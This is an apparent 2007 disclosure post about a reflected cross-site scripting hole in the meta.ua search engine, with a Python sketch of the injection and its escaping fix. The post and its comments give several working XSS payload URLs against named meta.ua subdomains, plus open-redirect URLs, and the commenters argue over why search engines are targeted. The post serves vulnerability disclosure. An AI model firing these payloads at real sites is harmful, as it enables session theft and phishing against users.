MOSEB-01 Bonus: XSS at meta.ua

22:31 01.06.2007

A new bonus vulnerability at meta.ua. I found this Cross-Site Scripting hole today, 01.06.2007.

The hole is at the main domain of the search engine, http://meta.ua, like MOSEB-01: Vulnerability at meta.ua, but in another script.

XSS:

The vulnerability is in the t parameter:
http://meta.ua/ua/topics.asp?t=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: surfing a list of sites in a search engine can be dangerous.

P.S.

The Meta guys need to fix today's MOSEB holes, as they did last time with the vulnerabilities at horo.meta.ua (I posted about them 3 days ago). The search engine Meta.ua is a frequent guest in my news.
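
Added example (not part of the original post and not Meta's code): the reported value of `t` starts with `'>`, which is what closes a single-quoted HTML attribute, so the sketch below reflects `t` into such an attribute with and without output encoding and checks what an HTML parser sees. The form markup and all function names are assumptions made for illustration; only the URL comes from the post.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# URL reported in the post above.
REPORTED_URL = ("http://meta.ua/ua/topics.asp"
                "?t=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E")

# Constructed markup (assumption): the real topics.asp output is not shown.
TEMPLATE = ("<form><input type='hidden' name='t' value='{t}'>"
            "<input type='submit'></form>")


def param_t(url):
    """URL-decoded value of the t parameter, as the server-side script sees it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("t", [""])[0]


def render_unsafe(t):
    # Before: request data is concatenated into the attribute unchanged.
    return TEMPLATE.format(t=t)


def render_safe(t):
    # After: encode for the HTML attribute context; quote=True also encodes
    # ' and ", the characters that close the attribute.
    return TEMPLATE.format(t=escape(t, quote=True))


class _Audit(HTMLParser):
    """Collects start tags and the decoded value of the hidden t field."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.t_value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "t":
            self.t_value = attrs.get("value")


def audit(markup):
    """Return (start tags in order, value of field t) as an HTML parser sees them."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.t_value
```

With encoding applied, the parser reports no `script` element and the hidden field carries the submitted string back intact as data, which makes `audit` usable as a regression check on rendered pages.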


5 responses to “MOSEB-01 Bonus: XSS at meta.ua”

  1. Trancer says:

    What’s the point in disclosing XSS vuln’s in search engines?
    within less than five minutes u can find about 10-20 xss and other vulnerabilities…
    xss:
    http://meta.ua/?news=%22%3E%3Cscript%3Ealert(’xss’)%3C/script%3E
    http://inter-biz.meta.ua/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://inter-biz.meta.ua/?q=foo&c=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://map.meta.ua/?map=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://bg.meta.ua/catalog.php?q=foo&t=0&rgn=0&c=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    redir:
    http://meta.ua/c.asp?href=http://google.com
    http://meta.ua/nav.asp?http://google.com

    got the point? the “Month of Search Engine Bugs” is nothing but lame and a waste of time for now…

  2. MustLive says:

    Trancer

    About disclosing vulnerabilities in search engines (and XSS in particular) I wrote in the announcement of the Month of Search Engines Bugs and the project description. So read them before asking dumb questions. I spent my time writing them to describe the project, so Trancer, please, read the announcement and project description.

    About the Meta engine. It is not an example to tell me that it is too easy to find XSS holes in search engines. Try to find within 5 minutes 10-20 XSS holes at Google, Yahoo and MSN (the top engines) and we will see - we’ll see that you will not say such things, because the top engines are much more secure and it is much harder to find holes in them. So no need to hurry with examples, because there are different engines (and many of them are in my list for the MOSEB project).

    About Meta’s security. I can call this engine (with all their services) “Resident XSS” :-) , since I found a lot of holes in it (different holes, but XSS particularly) this year and last year. If you look carefully at my site (it is maybe not easy for you, because the information is not in English, but you can try) you will find that Meta.ua is a frequent guest in my news. I wrote about vulnerabilities at meta.ua, help.meta.ua, context.meta.ua, lib.meta.ua, foto.meta.ua, forum.meta.ua, zakon.meta.ua, rabota.meta.ua, edu.meta.ua, cards.meta.ua, co.meta.ua, foto.meta.ua, forum.meta.ua, metamarket.com.ua, chumaki.meta.ua and horo.meta.ua. And I will write about many other holes at Meta’s projects.

    So no need to tell me about holes at this engine, because I know about the security of Meta much more than other people (even more than Meta’s developers). And I am trying to improve its security by informing developers about holes at the Meta engine and its projects.

  3. MustLive says:

    Trancer, about holes which you found.

    One of them was already found by me a long time ago. That hole at bg.meta.ua I found on 22.02.2007 (and there are other holes at that site). So it is not interesting (and lame) to tell me about vulns which I found long ago. But the other vulns are interesting (I didn’t find them yet, it was a matter of time). So thanks for those holes, I’ll inform Meta’s developers about them. And “q=foo” is not necessary for inter-biz.meta.ua and bg.meta.ua (the holes will work without it).

    About redirector holes. No need to hurry. I’ll write about this type of holes (in many search engines) at the end of the month. Like I said in the project description, I prepared a surprise for the last day of the month. So, man, just wait till the end of the month. There are many redirectors at Meta (as I wrote at my site before) and I’ll write about them at the necessary time (at the end of June). The nav.asp will be there and many others (thanks for c.asp, I put it on my list of redirectors at Meta). So wait a little with redirectors, there will be a day for them.

    And about your last statement (about lame and wasting of time). You don’t right before me and before yourself. Try to ask yourself why you are wasting your time here, if you think that it is not so interesting. There are two variants: either you like wasting your time or you believe in your heart that it is interesting (and not a waste of time). And from my side, Trancer, I’ll do my best to keep your hope alive. So look at the vulnerabilities in the project and you’ll find something for yourself. Everyone will find vulns for itself.

  4. Trancer says:

    FYI, I did read the announcement and project description. I did go back through your posts and realized that Meta is one of your favorites.
    Don’t tell me I ask dumb questions if you're not going to answer them. You did not answer this question in the project description or your feedback.
    WHY SEARCH ENGINES D00D??? What’s the difference between e-commerce\e-banking\social networks\web mails\blog systems or sites and content management systems in general? Most of them have much more risk potential against innocent users.

  5. MustLive says:

    Trancer

    It is good that you read them, because I was trying to answer possible questions in the announcement and project description. And Meta is not my favorite :-) . It is the only search engine from Ukraine that is worth mentioning, so it is the only Ukrainian engine in the list of participants and I am worried about their security (I am worried about the security of any site on the Web), so I put Meta in first place on the list. But my favorite is another engine (you can guess who, it is easy - just ask yourself who is the top SE in the world and you’ll find out my favorite engine).

    Don’t tell me I ask dumb questions if you're not going to answer them. You did not answer this question in the project description or your feedback.

    Dude, don’t be angry (as I see from your words). I always answer all questions. When I said dumb, I meant that this question is really unnecessary. I do because I do (MOSEB). And I was trying to answer this question in the announcement and description (yes, I know that it was not fully described, but I was trying, and there is some information about my motives).

    The short answer is I do because I do, because I believe in it, because I see the point. And it is my way. This is in short. I understand that you want to know my motives in detail and I can tell you that you are not the first (to other people I said that I’ll write in more detail in the description). And I wrote some information about my motives there (like I wrote in the preamble and in Main purpose of the project). To make everyone aware of the problem. And the main task - which will be the result of the project - is improvement of the security of search engines and the Internet as a whole.

    I can tell more and could write more in the description (and I planned so), but you must understand that it takes a lot of time. Because writing in English takes much more time from me (than writing in Ukrainian and Russian), so I didn’t write about everything (I couldn’t - due to a lack of time). I really spent a lot of time on that. There are many things that I can write, but I need to optimize my use of time (so there is only a little info about my motives). So you need to take what I wrote in the description: to demonstrate the real state of security in search engines and to bring truth to people about the real risks that engines bring to them. Or in short: I do what I do (and I believe in it).

    WHY SEARCH ENGINES D00D???

    Man, as I wrote in the announcement and description, because SE are the most popular sites in the world. For this reason I decided (a long time ago) to make a Month of Bugs in search engines.

    Why do I think that SE are more popular than other sites? It is from my experience, from different news and other sources. For example, look at Alexa - of the TOP5 sites (yahoo.com, msn.com, google.com, youtube.com and live.com) 4 are search engines. It is reality now - SE are the most popular sites in the world. So this kind of site has the largest risk potential.

    Other types of sites also have holes (most sites have vulns), so there is danger at other sites too. In this case I took SE as an example (because they are the most popular sites). And in my work of social security audit, every day I find vulns on different sites and tell their owners to attend to security. So everyone needs to take care of the security of their sites and this project will remind them about this.
